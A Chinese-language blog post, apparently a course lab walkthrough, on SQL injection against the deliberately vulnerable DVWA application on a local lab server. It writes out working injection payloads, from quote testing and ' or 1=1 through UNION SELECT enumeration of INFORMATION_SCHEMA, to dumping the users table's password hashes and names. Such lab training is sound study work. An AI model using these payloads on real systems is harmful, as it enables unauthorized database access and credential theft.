版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!
恰饭广告
实验之前请先阅读这篇文章:(https://www.idaobin.com/explain)
任务描述:
了解sql注入方法P170
任务环境说明:
攻击机:BT5
靶机:WEB服务器
攻击机安装服务/工具1:firefox
攻击机安装服务/工具2:
攻击机安装服务/工具3:
攻击机安装服务/工具4:
实现步骤:
1. 修改安全防护级别,改成低级,并保存配置
Firefox浏览器打开dvwa后台登录地址(http://10.10.10.129/dvwa/login.php)
管理员账号和密码:admin/admin
登录后台之后,对网站安全等级进行修改
2. 实现图4-11的效果;
SQL注入,查看是否存在注入漏洞
输入不正确字符“’”提交之后,出现以下提示信息则说明存在注入漏洞
通过特殊编制的SQL语句进行查询,获取网站后台的所有用户及密码
输入特殊编制的SQL语句’ or 1=1 — ‘提交之后,获取信息如下:
3. 实现图4-12的效果;
通过特殊编制的SQL语句查询更多信息
输入特殊字符串’ union select 1,2 — ‘提交之后,获取结果如下:
注意:提示说明该网站的数据表存在两列
4. 实现图4-13的效果;
输入SQL语句查询数据库更多信息’ union select 1, table_name from INFORMATION_SCHEMA.tables — ‘
检索INFORMATION_SCHEMA的结果如下:
注意:判断guestbook和users为网站所使用的数据表
5. 实现图4-14的效果;
输入SQL语句’ UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = ‘users’ — ‘ 列出users表的内容
列出users表的所有内容以后,查询到users表存在password列(密码内容)
输入SQL语句’ UNION SELECT NULL, password from users — ‘列出password列的密码内容(密码为MD5值,需要转换一下)
6. 实现图4-15的效果;
使用concat函数将所有信息列出来
输入SQL语句’ UNION SELECT password, concat (first_name, ‘ ‘ , last_name, ‘ ‘ , user) from users —
结果如下:
原文链接:https://www.idaobin.com/archives/699.html
让我恰个饭吧.ヘ( ̄ω ̄ヘ)
恰饭广告